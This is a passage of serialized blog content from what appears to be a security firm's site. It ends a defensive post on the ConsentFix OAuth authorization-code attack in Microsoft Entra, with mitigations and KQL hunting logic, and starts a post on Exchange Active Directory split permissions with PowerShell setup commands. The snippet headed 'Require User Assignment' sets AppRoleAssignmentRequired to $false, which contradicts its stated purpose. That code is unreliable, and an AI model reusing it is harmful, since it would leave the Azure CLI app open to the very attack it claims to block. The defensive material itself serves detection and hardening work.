users)",[531,18993],{},[251,18995,18996],{},"Mitigation:"," Medium (reduces the potential audience for the attack)",[531,18999],{},[251,19001,19002],{},"Scope:"," limited\n",[186,19005,19007],{"id":19006},"option-1-require-user-assignment","Option 1: Require User Assignment",[19009,19010,19012],"h4",{"id":19011},"pre-requisites","Pre-requisites:",[1255,19014,19015,19018,19021],{},[1258,19016,19017],{},"Add the service principal for affected first-party apps by using Microsoft Graph API or PowerShell",[1258,19019,19020],{},"Apply the user assignment requirement on the service principal object using Microsoft Graph API or PowerShell",[1258,19022,19023],{},"Establish a process to assign users upon request via Access Packages, PIM-for-Groups (for just-in-time access), or a combination of both.",[2126,19025,19026],{},"\n.code-block {\n background-color: #f6f8fa;\n padding: 0 16px 16px 16px;\n border-radius: 6px;\n font-family: Menlo, Consolas, Monaco, \"Courier New\", monospace;\n font-size: 14px;\n line-height: 1.5;\n overflow-x: auto;\n white-space: pre;\n border: 1px solid #d0d7de;\n}\n",[56,19028,19030],{"className":19029},[524],[63,19031,19032],{},"\n// Example for Microsoft Graph PowerShell\nConnect-MgGraph -Identity\n$AppId = \"04b07795-8ddb-461a-bbee-02f9e1bf7b46\" // Microsoft Azure CLI\n$sp = Get-MgServicePrincipal -Filter \"appId eq '$AppId'\"\nUpdate-MgServicePrincipal -ServicePrincipalId $sp.Id -AppRoleAssignmentRequired:$false\n",[19009,19034,19036],{"id":19035},"benefit","Benefit:",[1255,19038,19039,19042,19045,19048],{},[1258,19040,19041],{},"Enables management of user assignments through Access Packages or manual group membership to limit exposure to this attack technique.",[1258,19043,19044],{},"Option to provide just-in-time access combined with eligible group membership assignment, allowing temporary access to CLI tools and thereby further reducing the attack surface.",[1258,19046,19047],{},"Applied before evaluating Conditional Access policies.",[1258,19049,19050],{},"Limits the attack surface for other scenarios as well.",[19009,19052,19054],{"id":19053},"disadvantage","Disadvantage:",[1255,19056,19057,19060,19063],{},[1258,19058,19059],{},"Can only be scoped to specific users and not combined with other requirements like usage of specific devices",[1258,19061,19062],{},"All legitimate CLI tool users must be identified",[1258,19064,19065],{},"Side effects and organizational impact must be carefully assessed by reviewing previous sign-ins.",[186,19067,19069],{"id":19068},"option-2-block-access-by-using-conditional-access-policies","Option 2: Block access by using Conditional Access Policies",[19009,19071,19012],{"id":19072},"pre-requisites-1",[1255,19074,19075,19078],{},[1258,19076,19077],{},"Create a Conditional Access policy to block access to CLI tools, excluding legitimate users, by targeting \"Microsoft Graph Command Line Tools\" and \"Windows Azure Service Management API\"",[1258,19079,19080],{},"Manage exclusions via group membership, either manually or through entitlement management (e.g., Access Packages).",[19009,19082,19036],{"id":19083},"benefit-1",[1255,19085,19086,19089],{},[1258,19087,19088],{},"Prevents token issuance for non-legitimate or non-privileged users.",[1258,19090,19091],{},"Allows granular scoping based on additional conditions such as device or network.",[19009,19093,19054],{"id":19094},"disadvantage-1",[1255,19096,19097,19100],{},[1258,19098,19099],{},"All legitimate CLI tool users must be identified and excluded.",[1258,19101,19102],{},"Side effects and organizational impact must be carefully assessed by reviewing previous sign-ins and evaluating the policy in report-only mode.",[186,19104,19106],{"id":19105},"block-token-issuance-by-authorization-code-flow","Block token issuance by authorization code flow",[2126,19108,19109],{},"\n.option-block {\n background-color: #f6f8fa;\n padding: 16px;\n margin-bottom:2rem;\n border-radius: 6px;\n overflow-x: auto;\n border: 1px solid #d0d7de;\n}\n",[52,19111,19113,19116,19117,19119,19121,19122,19124,19121,19126,19128,19130],{"className":19112},[18987],[251,19114,19115],{},"Option:"," Require Token Protection",[531,19118],{},[251,19120,18990],{}," High",[531,19123],{},[251,19125,18996],{},[531,19127],{},[251,19129,19002],{}," Very limited\n",[19009,19132,19012],{"id":19133},"pre-requisites-2",[1255,19135,19136,19139,19142,19161],{},[1258,19137,19138],{},"Microsoft Entra ID P1 licenses",[1258,19140,19141],{},"Entra ID Registered Devices, Hybrid or Entra ID-joined devices on Windows platform",[1258,19143,19144,19145,805,19150,4598,19155,19160],{},"Enable Web Account Manager (WAM) in ",[2630,19146,19149],{"href":19147,"rel":19148},"https://learn.microsoft.com/en-us/cli/azure/authenticate-azure-cli-interactively?view=azure-cli-latest#sign-in-with-web-account-manager-wam-on-windows",[3135],"Azure CLI",[2630,19151,19154],{"href":19152,"rel":19153},"https://learn.microsoft.com/en-us/powershell/azure/configure-global-settings?view=azps-15.1.0#web-account-manager-wam",[3135],"Azure PowerShell",[2630,19156,19159],{"href":19157,"rel":19158},"https://learn.microsoft.com/en-us/powershell/module/microsoft.graph.authentication/set-mggraphoption?view=graph-powershell-1.0#set-web-account-manager-support",[3135],"Microsoft Graph PowerShell"," (default in latest versions)",[1258,19162,19163,19164],{},"Configure Conditional Access targeting:\n",[1255,19165,19166,19180,19187],{},[1258,19167,19168,19169],{},"Cloud App targeting to the following apps:\n",[1255,19170,19171,19174,19177],{},[1258,19172,19173],{},"Office 365 Exchange Online",[1258,19175,19176],{},"Office 365 SharePoint Online",[1258,19178,19179],{},"Microsoft Teams Services",[1258,19181,19182,19183,19186],{},"Client apps under ",[4328,19184,19185],{},"Mobile apps and desktop clients"," to require Token Protection.",[1258,19188,19189,19190,19193,19194,19197],{},"Select ",[4328,19191,19192],{},"Windows"," as ",[4328,19195,19196],{},"device platform"," for targeting the policy",[19009,19199,19036],{"id":19200},"benefit-2",[12,19202,19203],{},"Microsoft Entra’s token protection requires proof‑of‑possession (PoP), which can only be enforced when the client communicates directly with a trusted token broker such as the Web Account Manager (WAM) on Windows. Because browsers cannot establish this secure channel, the authorization code flow initiated in a browser is blocked under token protection policies.",[12,19205,19206],{},"When the policy enforces token protection that requires broker‑managed PoP, the authorization code returned to a browser cannot be redeemed because the browser cannot produce the required broker‑signed proof during the code to token exchange",[12,19208,19209],{},"In this case, attacks with AuthCodeFix will be fully mitigated as long the application can be protected by Token Protection.",[12,19211,19212],{},"As shown in the screenshot below, Token Protection successfully mitigates the redemption of the authorization code flow initiated by the victim through a phishing action.",[12,19214,19215],{},[2772,19216],{"alt":19217,"src":19218},"Token Protection successfully mitigates the redemption of the authorization code flow","https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-07.png",[19009,19220,19054],{"id":19221},"disadvantage-2",[1255,19223,19224,19254,19257,19260],{},[1258,19225,19226,19227],{},"Only the following resources are officially supported:\n",[1255,19228,19229,19231,19233],{},[1258,19230,19173],{},[1258,19232,19176],{},[1258,19234,19179,19235,19237,19239,19240,4598,19243,19247,19248,19253],{},[531,19236],{},[531,19238],{},"\nThe Microsoft Graph API is indirectly covered by the previously mentioned resources and Microsoft Graph PowerShell is listed as a supported client. We were able to verify in our testing that the attack for this scenario will be mitigated. “Windows Azure Service Management API\" is not listed as a supported resource. Both CLI clients (",[2630,19241,19149],{"href":19147,"rel":19242},[3135],[2630,19244,19154],{"href":19245,"rel":19246},"https://learn.microsoft.com/en-us/powershell/azure/authenticate-interactive?view=azps-15.1.0#benefits-of-wam",[3135],") support WAM which is a client-side requirement to use Token Protection. Microsoft has been announced ",[2630,19249,19252],{"href":19250,"rel":19251},"https://techcommunity.microsoft.com/blog/microsoft-entra-blog/how-to-break-the-token-theft-cyber-attack-chain/4062700",[3135],"in a blog post"," to extend token protection capabilities for Azure management scenarios.",[1258,19255,19256],{},"Some bugs in Microsoft Graph PowerShell force you to temporarily disable WAM integration",[1258,19258,19259],{},"Side effects and organizational impact must be carefully assessed by reviewing previous sign-ins and evaluating the policy in report-only mode. The cloud app targeting will also effect productivity access to Microsoft 365.",[1258,19261,19262],{},"Limited scope due to availability on supported platforms and Entra ID–integrated devices.",[186,19264,19266],{"id":19265},"block-further-token-issuance-by-compliant-network-check-or-trusted-network","Block further token issuance by compliant network check or trusted network",[52,19268,19270,19272,19273,19275,19272,19277,19279,19281],{"className":19269},[18987],[251,19271,18990],{}," Medium",[531,19274],{},[251,19276,18996],{},[531,19278],{},[251,19280,19002],{}," Broad\n",[186,19283,19285],{"id":19284},"option-block-access-outside-of-compliant-network-with-global-secure-access","Option: Block access outside of Compliant network with Global Secure Access",[19009,19287,19289],{"id":19288},"pre-requisite","Pre-requisite:",[1255,19291,19292,19295,19298,19301],{},[1258,19293,19294],{},"Entra ID P1 license",[1258,19296,19297],{},"Entra ID Registered Devices, Hybrid or Entra ID-joined devices on Windows, macOS, Androind and iOS platform",[1258,19299,19300],{},"Global Secure Access Client on all affected clients and enabled Entra Internet Access for M365 Traffic Profile",[1258,19302,19303],{},"Conditional Access Policy to enforce network compliant check should be applied to all cloud apps",[19009,19305,19036],{"id":19306},"benefit-3",[12,19308,19309],{},"Block additional token issuance by enforcing a trusted network check. This mitigation ensures attackers cannot obtain new tokens using the refresh token from the authorization code flow. However, it does not prevent the initial redemption of the authorization code or the issuance of the first access token, which remains valid outside the compliant network because it was originally requested by the victim.",[2109,19311,19312],{},[12,19313,19314],{},"Enforcing GSA with the Compliant Network condition also blocks other Token Replay scenarios and adds additional logs which can be very useful for detections and hunting.",[19009,19316,19054],{"id":19317},"disadvantage-3",[1255,19319,19320,19323,19326],{},[1258,19321,19322],{},"Only applicable for users and devices with deployed Global Secure Access client",[1258,19324,19325],{},"Limited scope due to availability on Entra ID–integrated devices",[1258,19327,19328],{},"Enforcing Compliant Networks via CA will need some Exclusions like Intune to avoid chicken-egg-problems. Detailed testing is needed before rollout",[41,19330,19332],{"id":19331},"hunting-queries","Hunting queries",[12,19334,19335,19336,19339],{},"Once all the prerequisites for token theft mitigations are met - such as deploying the GSA client (including ingestion of ",[63,19337,19338],{},"NetworkAccessTraffic"," logs) and taking benefit of WAM authentication - we gain additional options for threat hunting and verification.",[186,19341,19343],{"id":19342},"leveraging-gsa-logs-and-wam-authentication-for-hunting-or-verify-confidence-on-detection-results","Leveraging GSA Logs and WAM Authentication for hunting or verify confidence on detection results",[12,19345,19346,19347,19349],{},"This hunting query leverages ",[63,19348,19338],{}," logs from Global Secure Access (GSA), which include the initiating process for communication with the Microsoft Entra token endpoint. This helps determine whether a token request originated directly from a browser and also whether any additional token requests were made outside the GSA network.",[2109,19351,19352],{},[12,19353,19354],{},"This query works and delivers only reliable results when the prerequisites are met; otherwise, it leads to a high false-positive rate.",[12,19356,19357,19360,19361,19364,19365,19368],{},[251,19358,19359],{},"Why this matters:"," When signing in via CLI or PowerShell modules using Web Account Manager (WAM) on Windows Devices, the flow does not involve a browser-based authorization code. This sign-in behavior is the default in the latest version. Therefore, if the initiating process is a browser executable (e.g., ",[63,19362,19363],{},"msedge.exe","), this is a strong indicator of suspicious activity. On macOS, the process is initiated by the Company Portal app (",[63,19366,19367],{},"com.microsoft.CompanyPortalMac.ssoextension",") when using Platform SSO.",[12,19370,19371,19374],{},[251,19372,19373],{},"Token Binding and PoP:"," WAM authentication typically binds tokens to the device by enforcing Proof-of-Possession (PoP). Attackers cannot issue further bounded tokens without PoP, so an unbounded refresh token is another strong indicator.",[12,19376,19377,19380],{},[251,19378,19379],{},"Limitations:"," All the mentioned signals are only available when the accessing device is registered with or joined to Microsoft Entra ID.",[12,19382,19383,19386],{},[251,19384,19385],{},"Confidence Score Logic:"," The query combines multiple signals to calculate a confidence score:",[1255,19388,19389,19392,19395],{},[1258,19390,19391],{},"Presence of a browser process initiating token requests.",[1258,19393,19394],{},"Detection and down grade to unbounded tokens.",[1258,19396,19397],{},"Network provider changes (including Compliant to non-compliant) between sign-ins.",[12,19399,19400],{},"These signals can be used in the query to hunt for activity or to derive a confidence score in the event of an incident based on the previous detection.",[12,19402,19403],{},[2772,19404],{"alt":19405,"src":19406},"Signals for the hunting query","https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-08.png",[12,19408,19409],{},"The following scoring will be shown depending on the conditions:",[12,19411,19412,19415,19416,19418,19419,19421,19423,19426,19427,19429,19431,19434],{},[251,19413,19414],{},"A very high confidence score"," is displayed when ",[63,19417,19338],{}," logs indicate a familiar browser process instead of initiating a token request, and a downgrade of an unbound token has been detected.",[531,19420],{},[531,19422],{},[251,19424,19425],{},"A high confidence score"," is shown when the sign-in occurs from a different Network Provider (ASN) and a non-compliant network involving unbound tokens.",[531,19428],{},[531,19430],{},[251,19432,19433],{},"A medium confidence score"," is shown when only a change in Network Provider and compliant network is identified, along with a change in the token type used.",[12,19436,19437,19438,1014],{},"You’ll find the latest version of the hunting query on ",[2630,19439,19442],{"href":19440,"rel":19441},"https://github.com/Cloud-Architekt/AzureSentinel/blob/main/Hunting%20Queries/EID-Authentication/ConsentFix-HuntingConfidenceOnTokenAndNetworkSignals.kusto",[3135],"GitHub",[186,19444,19446],{"id":19445},"hunting-for-activities-by-issued-tokens","Hunting for activities by issued tokens",[12,19448,19449,19450,19455,19456,19459,19460,19462,19463,19466],{},"You should consider expanding your investigation beyond sign-in events to include activities performed using tokens issued by the attacker. Our colleague Thomas Naunheim has ",[2630,19451,19454],{"href":19452,"rel":19453},"https://github.com/Cloud-Architekt/AzureSentinel/blob/main/Hunting%20Queries/EID-TokenHunting/MicrosoftCloudActivity.func",[3135],"published a KQL function"," called ",[63,19457,19458],{},"MicrosoftCloudActivity",", which can assist in this extended hunting process. Additionally, the affected ",[63,19461,18889],{}," can be correlated with suspicious ",[63,19464,19465],{},"UniqueId"," values identified during previous hunts for deeper analysis.",[12,19468,19469],{},[2772,19470],{"alt":19471,"src":19472},"KQL function","https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-09.png",[12,19474,19475],{},"In this example, the attacker leveraged the refresh token obtained during the attack to issue an access token for the Microsoft Graph API. This token was then used to maintain persistent access and lateral movement by adding a client secret to an application owned by the victim. The query provides details about the Graph API operation, including the token protection status and whether the operation occurred outside the Global Secure Access network.",[12,19477,19478],{},[2772,19479],{"alt":19480,"src":19481},"Graph API operation screenshot","https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-10.png",[41,19483,19485],{"id":19484},"further-reading","Further Reading",[1255,19487,19488,19495,19502,19509],{},[1258,19489,19490],{},[2630,19491,19494],{"href":19492,"rel":19493},"https://pushsecurity.com/blog/consentfix",[3135],"ConsentFix: Analysing a browser-native ClickFix-style attack that hijacks OAuth consent grants - PushSecurity",[1258,19496,19497],{},[2630,19498,19501],{"href":19499,"rel":19500},"https://youtu.be/AAiiIY-Soak",[3135],"Hacking Endpoint to Identity (Microsoft 365): \"ConsentFix\" - YouTube",[1258,19503,19504],{},[2630,19505,19508],{"href":19506,"rel":19507},"https://learn.microsoft.com/en-us/entra/identity-platform/v2-oauth2-auth-code-flow",[3135],"Microsoft identity platform and OAuth 2.0 authorization code flow",[1258,19510,19511],{},[2630,19512,19515],{"href":19513,"rel":19514},"https://entrascopes.com/?appId=04b07795-8ddb-461a-bbee-02f9e1bf7b46",[3135],"Microsoft Azure CLI on entrascpes.com",{"title":65,"searchDepth":111,"depth":111,"links":19517},[19518,19521,19522,19523,19531,19535],{"id":18847,"depth":111,"text":18848,"children":19519},[19520],{"id":18873,"depth":329,"text":18874},{"id":18926,"depth":111,"text":18927},{"id":18942,"depth":111,"text":18943},{"id":18978,"depth":111,"text":18979,"children":19524},[19525,19526,19527,19528,19529,19530],{"id":18982,"depth":329,"text":18983},{"id":19006,"depth":329,"text":19007},{"id":19068,"depth":329,"text":19069},{"id":19105,"depth":329,"text":19106},{"id":19265,"depth":329,"text":19266},{"id":19284,"depth":329,"text":19285},{"id":19331,"depth":111,"text":19332,"children":19532},[19533,19534],{"id":19342,"depth":329,"text":19343},{"id":19445,"depth":329,"text":19446},{"id":19484,"depth":111,"text":19485},{"lang":2170,"seoTitle":19537,"titleClass":2172,"date":19538,"categories":19539,"blogtitlepic":19540,"socialimg":19541,"customExcerpt":19542,"keywords":19543,"hreflang":19544,"scripts":19549,"asideNav":19550,"maxContent":2180,"published":2180},"ConsentFix: How a New OAuth Attack Bypasses Microsoft Entra Conditional Access","2025-12-31",[2175],"head-consentfix","/heads/head-consentfix.jpg","Just before year's end, ConsentFix emerges: a clever OAuth-based attack that abuses legitimate authentication flows to steal the authorization code, effectively handing attackers the keys to Microsoft Entra. We break down why this works despite Conditional Access, which signals it leaves behind in the logs, and how defenders can detect and stop it before real damage is done.","ConsentFix attack, OAuth authorization code theft, Microsoft Entra OAuth attack, Azure CLI token abuse, Entra ID Conditional Access bypass, authorization code phishing, token replay attack Azure, Proof of Possession tokens, WAM authentication security, Azure sign-in log analysis, detect OAuth attacks Entra, Azure identity threat hunting, Global Secure Access token protection, Microsoft Entra security detection",[19545,19547],{"lang":2260,"href":19546},"/de/posts/2025-12-31-vulnerability-consentfix",{"lang":2170,"href":19548},"/es/posts/2025-12-31-vulnerability-consentfix",{"slick":2180,"form":2180},{"menuItems":19551},[19552,19554,19556,19558,19560,19562],{"href":19553,"text":18848},"#detection-artifacts",{"href":19555,"text":18927},"#reduce-the-noise",{"href":19557,"text":18943},"#affected-first-party-applications",{"href":19559,"text":18979},"#mitigations-and-protections",{"href":19561,"text":19332},"#hunting-queries",{"href":19563,"text":19485},"#further-reading","/posts/2025-12-31-vulnerability-consentfix",{"title":18752,"description":18758},"posts/2025-12-31-vulnerability-consentfix",[19568,19569,3305],"OAuth 2.0","Microsoft Entra ID","FeRkYBxL6Cs3rWE3W6zzA_RRRyTZcOSeBsfb2kNOarM",{"id":19572,"title":19573,"author":19574,"body":19576,"cta":2165,"description":65,"eventid":2165,"extension":2166,"hideInRecent":2180,"layout":2168,"meta":20110,"moment":20112,"navigation":2180,"path":20135,"seo":20136,"stem":20137,"tags":2165,"webcast":2167,"__hash__":20138},"content_es/posts/2026-01-27-exchange-active-directory.md","​​​Exchange AD Split Permissions without regrets​",[19575],"​Thorsten Kunzi​",{"type":9,"value":19577,"toc":20093},[19578,19582,19585,19591,19595,19617,19620,19624,19630,19644,19650,19653,19657,19693,19712,19716,19722,19730,19734,19750,19754,19760,19764,19774,19779,19784,19803,19807,19832,19836,19856,19864,19878,19892,19952,19956,19980,19997,20009,20022,20029,20033,20043,20054,20066,20070,20073,20076,20090],[186,19579,19581],{"id":19580},"tldr-what-if-we-remove-the-downsides","TLDR: what if we remove the downsides?",[12,19583,19584],{},"I found a way to re-grant the AD and RBAC permissions where the Exchange user, groups, contacts, etc. reside. This way there is no adoption needed for admins or identity management systems, which in my experience was the blocker for most companies to implement it. And we still get the security benefit against lateral movement and domain compromise.",[12,19586,19587],{},[2772,19588],{"alt":19589,"src":19590},"Active Directory","https://res.cloudinary.com/c4a8/image/upload/v1770991330/blog/pics/Blog_-_Exchange_AD_Split_Permissions_-_1.png",[186,19592,19594],{"id":19593},"its-achieved-in-three-steps","It’s achieved in three steps:",[6086,19596,19597,19607,19612],{},[1258,19598,19599,19600,19605],{},"Implement ",[2630,19601,19604],{"href":19602,"rel":19603},"https://learn.microsoft.com/en-us/exchange/permissions/split-permissions/configure-exchange-for-split-permissions#switch-to-active-directory-split-permissions",[3135],"AD split permission model",[531,19606],{},[1258,19608,19609,19610],{},"Grant Exchange servers the lost AD permissions, but only on the relevant OUs",[531,19611],{},[1258,19613,19614,19615],{},"Grant Exchange RBAC to re-enable missing PowerShell cmdlets",[531,19616],{},[12,19618,19619],{},"All via Microsoft’s guidance, AD ACLs or Exchange RBAC assignments.",[186,19621,19623],{"id":19622},"why-do-we-care-now","Why do we care (now)?",[12,19625,19626,19627,19629],{},"It has been largely overlooked or ignored since it was introduced with Exchange 2010 SP1. But the default shared permissions model represents a big security risk to Active Directory takeover. Combined with Exchange being notorious for remote exploits these last few years, it’s time to act!",[531,19628],{},"\nThe problem originates from privileges granted to the root of a domain that get inherited throughout the domain.",[1255,19631,19632,19635,19638,19641],{},[1258,19633,19634],{},"modify permissions on users and groups (effectively full access)",[1258,19636,19637],{},"modify group members",[1258,19639,19640],{},"reset password on users",[1258,19642,19643],{},"create/delete users and groups",[12,19645,19646],{},[2772,19647],{"alt":19648,"src":19649},"Permissions","https://res.cloudinary.com/c4a8/image/upload/v1770991330/blog/pics/Blog_-_Exchange_AD_Split_Permissions_-_2.png",[12,19651,19652],{},"Only certain high privileged Tier0 users and groups are protected by the AdminSDHolder process (attribute admincount=1) and in many environments there will be unprotected users or groups that could allow compromise of the domain and/or forest or at least cause serious impact.",[186,19654,19656],{"id":19655},"prominent-examples","Prominent examples:",[1255,19658,19659,19662,19682],{},[1258,19660,19661],{},"Entra Connect Sync account when using PWHashSync",[1258,19663,19664,19665],{},"Default groups\n",[1255,19666,19667,19670,19679],{},[1258,19668,19669],{},"Allowed RODC Password Replication Group together with EntraConnect account (If a real Windows RODC exists)",[1258,19671,19672,19673,19678],{},"Also see ",[2630,19674,19677],{"href":19675,"rel":19676},"https://specterops.io/blog/2025/06/25/untrustworthy-trust-builders-account-operators-replicating-trust-attack-aorta/",[3135],"Untrustworthy Trust Builders: Account Operators Replicating Trust Attack (AORTA) - SpecterOps"," showing more paths (Account Operators group is a similar threat)",[1258,19680,19681],{},"Emptying Protected Users to create attack vectors by removing protections",[1258,19683,19684,19685],{},"Unprotected custom groups or admin/service accounts\n",[1255,19686,19687,19690],{},[1258,19688,19689],{},"Write permission on GPOs (applying to domain controller)",[1258,19691,19692],{},"Managing access to AD backups, backup server, PKI templates, hypervisor, ...",[12,19694,19695,19696,19698,19699,19704,19706,19707],{},"It is very hard to retroactively contain all these current and future potential pathways. For the _ADM custom OU you could disable ACL inheritance, but most default objects may not be moved from the default Builtin OU or Users container and remain vulnerable.",[531,19697],{},"\nIt is much better to remove the powerful permissions from the root, which is done by implementing the Active Directory split permissions model. ",[2630,19700,19703],{"href":19701,"rel":19702},"https://learn.microsoft.com/en-us/exchange/permissions/split-permissions/configure-exchange-for-split-permissions",[3135],"Configure Exchange Server for split permissions | Microsoft Learn",[531,19705],{},"\nAnd Microsoft agrees “…encouraged to implement Active Directory split permissions” ",[2630,19708,19711],{"href":19709,"rel":19710},"https://techcommunity.microsoft.com/blog/coreinfrastructureandsecurityblog/active-directory-hardening-series---part-7-%E2%80%93-implementing-least-privilege/4366626",[3135],"Active Directory Hardening Series - Part 7 – Implementing Least Privilege | Microsoft Community Hub",[41,19713,19715],{"id":19714},"but-why-is-no-one-doing-it","But why is no one doing it?",[12,19717,19718,19719,19721],{},"As split permissions weren’t available until Exchange 2010 SP1 everyone had accepted it by then and it seems that security teams did not manage to push successfully once it existed.",[531,19720],{},"\nAnd it would have forced changes to admin and IDM processes, like creating users or distribution lists in AD first and only afterwards using Exchange to “mail enable” them.",[12,19723,19724,19725,19727],{},"No longer available or working cmdlets:",[531,19726],{},[63,19728,19729],{},"Add-DistributionGroupMember, New-DistributionGroup, New-Mailbox, New-MailContact, New-MailUser, New-RemoteMailbox, Remove-DistributionGroup, Remove-DistributionGroupMember, Remove-Mailbox, Remove-MailContact, Remove-MailUser, Remove-RemoteMailbox, Update-DistributionGroupMember, Add-ADPermission, Remove-ADPermission ",[186,19731,19733],{"id":19732},"adoption-examples","Adoption examples:",[1255,19735,19736,19747],{},[1258,19737,19738,19739],{},"New-Mailbox (where Exchange writes to AD) would be:\n",[1255,19740,19741,19744],{},[1258,19742,19743],{},"New-ADUser (where adm.jdoe writes to AD)",[1258,19745,19746],{},"Enable-Mailbox",[1258,19748,19749],{},"Add-ADPermission for SendAs rights would have to be done via AD users and computers in the security tab and often requiring additional AD permissions for standard admins.",[41,19751,19753],{"id":19752},"show-me-this-no-regrets-option","Show me this no-regrets option!",[12,19755,19756,19759],{},[251,19757,19758],{},"Disclaimer",": Please fully read and understand the following links and articles, perform in a test environment first, make sure AD backups are current and recovery practices are established!",[186,19761,19763],{"id":19762},"audit-current-usage","Audit current usage",[12,19765,19766,19769,19771],{},[251,19767,19768],{},"You should first check which of the affected cmdlets are in use on which OUs.",[531,19770],{},[63,19772,19773],{},"$CsvPath =\"C:\\temp\\SplitPermissionAdminAuditLog.csv\"",[12,19775,19776],{},[63,19777,19778],{},"$Cmdlets = \"Add-ADPermission\",\"Remove-ADPermission\",\"New-DistributionGroup\",\"Remove-DistributionGroup\",\"Add-DistributionGroupMember\",\"Update-DistributionGroupMember\",\"Remove-DistributionGroupMember\",\"New-Mailbox\",\"Remove-Mailbox\",\"New-RemoteMailbox\",\"Remove-RemoteMailbox\",\"New-MailUser\",\"Remove-MailUser\",\"New-MailContact\",\"Remove-MailContact\"",[12,19780,19781],{},[63,19782,19783],{},"Search-AdminAuditLog -ResultSize 99000 -Cmdlets $Cmdlets| select RunDate,Caller,ObjectModified,CmdletName,@{Name='CmdletParameters';Expression={[string]::join(\",\", ($_.CmdletParameters))}},succeeded,error | Export-Csv -Path $CsvPath -Delimiter \";\" -Encoding Unicode -NoTypeInformation",[12,19785,19786,19789,19791,19794,19797,19800],{},[251,19787,19788],{},"Quick Analysis of caller and cmdlets:",[531,19790],{},[63,19792,19793],{},"$CSVs=Import-Csv -Path $CsvPath -Delimiter \";\"",[63,19795,19796],{},"$CSVs|group Caller",[63,19798,19799],{},"$CSVs|group CmdletName",[63,19801,19802],{},"Analyze the CSV for where AD permissions will be needed. Potentially optimize by moving all Exchange relevant groups into dedicated OUs.",[186,19804,19806],{"id":19805},"enable-split-permissions-model","Enable split permissions model",[12,19808,19809,19816,19818,19819,19821,19824,19826,540,19829],{},[251,19810,19811,19812,19815],{},"Follow instructions of “Switch to Active Directory split permissions” in ",[2630,19813,19703],{"href":19602,"rel":19814},[3135]," (NOT RBAC split permissions)",[531,19817],{},"\nIn essence it will remove the dangerous permissions of “Exchange Windows Permissions” group and also remove Exchange as group member.",[531,19820],{},[63,19822,19823],{},"Setup.exe /IAcceptExchangeServerLicenseTerms_DiagnosticDataOFF /PrepareAD /ActiveDirectorySplitPermissions:true",[531,19825],{},[251,19827,19828],{},"To revert back just use:",[63,19830,19831],{},"/ActiveDirectorySplitPermissions:false",[186,19833,19835],{"id":19834},"grant-ad-permissions","Grant AD Permissions",[12,19837,19838,19841,19843,19844,19846,19849,19851,19853],{},[251,19839,19840],{},"Create a custom AD group and make Exchange server members.",[531,19842],{},"\nadjust OU Path first!",[531,19845],{},[63,19847,19848],{},"New-ADGroup -Name \"AD_Custom Exchange Split permissions replacement\" -GroupCategory Security -GroupScope DomainLocal -Path \"OU=Rights,OU=Groups,OU=T1,OU=_ADM,$((Get-ADDomain).DistinguishedName)\" -Description \"replaces the permissions lost by split permissions on relevant OUs\"",[531,19850],{},[531,19852],{},[63,19854,19855],{},"Add-ADGroupMember \"AD_Custom Exchange Split permissions replacement\" -Members \"Exchange Trusted Subsystem\"",[12,19857,19858,19861,19863],{},[251,19859,19860],{},"reboot Exchange servers for permissions via group to work",[531,19862],{},"\nI’ve created a script to make delegating the AD permissions easy per use case.",[2109,19865,19866],{},[12,19867,19868,19873,19874,19877],{},[251,19869,19870],{},[4328,19871,19872],{},"INFO:"," Without these permissions the Exchange server would receive the error ",[63,19875,19876],{},"“INSUFF_ACCESS_RIGHTS”"," from AD.",[12,19879,19880,19889,19891],{},[251,19881,19882,19883,19888],{},"Download ",[2630,19884,19887],{"href":19885,"rel":19886},"https://github.com/glueckkanja/code-snippets/blob/main/ExchangeADSplitPermission/Add-ExchangeADSplitPermissionOnOU.ps1",[3135],"Add-ExchangeADSplitPermissionOnOU.ps1"," from glueckkanja GitHub",[531,19890],{},"\nIt can grant the following PermissionTypes:",[1255,19893,19894,19907,19927,19940],{},[1258,19895,19896,19899],{},[251,19897,19898],{},"CreateUserAndContact",[1255,19900,19901,19904],{},[1258,19902,19903],{},"Create/delete, ResetPassword and WriteAllProperties for Users and Contacts",[1258,19905,19906],{},"Exchange cmdlets: New-Mailbox, New-RemoteMailbox, New-MailUser, New-MailContact and the matching Remove-*",[1258,19908,19909,19912],{},[251,19910,19911],{},"GroupManage",[1255,19913,19914,19917,19920],{},[1258,19915,19916],{},"Create/Delete Groups, Modify Member",[1258,19918,19919],{},"Exchange cmdlets: New-DistributionGroup, Remove-DistributionGroup, Add-DistributionGroupMember, Update-DistributionGroupMember, Remove-DistributionGroupMember",[1258,19921,19922,19923],{},"Additional usecases: user managing DistributionGroups they own via https://",[19924,19925,19926],"on-prem-exchange",{},"/EAC",[1258,19928,19929,19932],{},[251,19930,19931],{},"UserSendAs",[1255,19933,19934,19937],{},[1258,19935,19936],{},"Modfiy AD Permissions on Users",[1258,19938,19939],{},"Exchange cmdlet: Add-ADPermission",[1258,19941,19942,19945],{},[251,19943,19944],{},"GroupSendAs",[1255,19946,19947,19950],{},[1258,19948,19949],{},"Modfiy AD Permissions on Groups",[1258,19951,19939],{},[186,19953,19955],{"id":19954},"how-to-use-the-script","How to use the script:",[12,19957,19958],{},[63,19959,19960,540,19963,540,19969,540,19972,540,19977],{},[63,19961,19962],{},"Add-ExchangeADSplitPermissionOnOU.ps1 -TargetOU",[19964,19965,19966],"b",{},[63,19967,19968],{},"\u003COU>",[63,19970,19971],{},"-PermissionType",[19964,19973,19974],{},[63,19975,19976],{},"\u003CGroupManage|UserSendAs|GroupSendAs|CreateUserAndContact>",[63,19978,19979],{},"-Trustee \"AD_Custom Exchange Split permissions replacement",[12,19981,19982,19983,19985],{},"e.g.",[531,19984],{},[63,19986,19987,540,19990,540,19994],{},[63,19988,19989],{},"Add-ExchangeADSplitPermissionOnOU.ps1 -TargetOU \"OU=ExchangeGroups,OU=HQ,OU=Alderaan,$((Get-ADDomain).DistinguishedName)\" -PermissionType",[19964,19991,19992],{},[63,19993,19911],{},[63,19995,19996],{},"-Trustee \"AD_Custom Exchange Split permissions replacement\"",[12,19998,19999],{},[63,20000,20001,540,20003,540,20007],{},[63,20002,19989],{},[19964,20004,20005],{},[63,20006,19944],{},[63,20008,19996],{},[12,20010,20011],{},[63,20012,20013,540,20016,540,20020],{},[63,20014,20015],{},"Add-ExchangeADSplitPermissionOnOU.ps1 -TargetOU \"OU=Users,OU=HQ,OU=Alderaan,$((Get-ADDomain).DistinguishedName)\" 